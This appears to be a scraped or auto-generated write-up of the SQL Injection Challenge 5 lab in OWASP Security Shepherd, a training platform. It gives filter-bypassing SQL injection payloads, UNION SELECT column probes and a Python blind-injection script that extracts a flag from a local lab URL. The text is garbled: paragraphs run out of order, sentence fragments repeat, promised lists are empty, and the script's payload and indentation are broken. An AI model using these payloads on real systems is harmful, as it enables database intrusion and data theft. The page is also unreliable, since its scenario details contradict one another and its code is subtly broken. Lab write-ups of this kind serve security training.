Sql+injection+challenge+5+security+shepherd+new «Chrome SAFE»

If you enter 1 and 1=1, the server might respond with a 200 OK. But if you enter a more complex payload like 1 UNION SELECT username FROM users, the filter kicks in. How do we bypass space filtering?

Technique: Use SQL comments (/**/) or alternative whitespace characters like %0a (newline) or %0d (carriage return).

Solution: Replace every space with /**/.

1/**/and/**/1=1 works beautifully.

The developer thought prepared statements were used everywhere, but the LIKE clause was dynamically concatenated. The input filter only blocked single quotes, but not backslashes, double quotes, or parentheses — and client-side validation is trivially bypassed.

The lesson: Never concatenate user input into SQL, even in a LIKE clause. Use parameterized queries for LIKE by escaping wildcards properly. sql+injection+challenge+5+security+shepherd+new

Let’s assume the underlying query is: SELECT first_name, last_name FROM user_data WHERE user_id = ' + userInput + '

Doing this manually takes hours. Use a Python script with requests and binary search logic:

import requests
url = "http://localhost:8080/challenge5.jsp"
flag = ""
position = 1
while True:
for ascii_val in range(32, 127):
char = chr(ascii_val)
# Blind boolean payload
payload = f"1'//aNd//(SeLeCt//SuBsTrInG(flag,{position},1)//FrOm//users//LiMiT//0,1)//=/**/'{char}'-- -"
params = {"userid": payload}
resp = requests.get(url, params=params)
    if "User Found" in resp.text:
        flag += char
        print(f"Found: {flag}")
        position += 1
        break
else:
    # No more characters found
    print(f"Final flag: {flag}")
    break

Before we dive into the injection itself, let’s establish context. OWASP Security Shepherd is a web and mobile application security training platform. Unlike vulnerable VMs that require installation, Shepherd is a deliberately flawed application designed to teach secure coding. It features escalating difficulty levels (Modules 1-10), with SQL Injection Challenge 5 acting as the bridge between novice "copy-paste" hackers and true manual exploit developers.

You’ve just completed Challenge 4, where you bypassed a login using a basic ' OR '1'='1 attack. Now, Challenge 5 presents a new target: "Secure Note-Taker Pro" — a minimalist web app that claims to have fixed all SQL injection vulnerabilities.

The challenge description reads:

"Our new note-taking app uses prepared statements for all database queries. However, one developer thought it would be 'more efficient' to dynamically build a search query for the admin panel. Your goal: retrieve the administrator's private note." If you enter 1 and 1=1 , the

You are given a guest account:

The app has two pages:

You will notice the keyword "new" appearing frequently in search queries. Historically, earlier versions of Security Shepherd (pre-2021) had a relatively straightforward SQLi in Challenge 5. However, the "new" iteration—updated for modern OWASP Top 10 compliance—introduced three critical changes:

These changes force the attacker to use blind, boolean-based, case-shifted injection.

We cannot use ORDER BY easily due to space filters, so we use UNION SELECT NULL. Payload: 1'/**/UnIoN/**/SeLeCt/**/NULL/**/aNd/**/1=2-- - Let’s assume the underlying query is: SELECT first_name,

If this returns no rows (False), try two columns. Payload: 1'/**/UnIoN/**/SeLeCt/**/NULL,NULL/**/aNd/**/1=2-- -

Expected result: When the number of NULLs matches the original SELECT (likely 2 columns), the page returns "User Found" even with the 1=2 condition. This confirms 2 columns.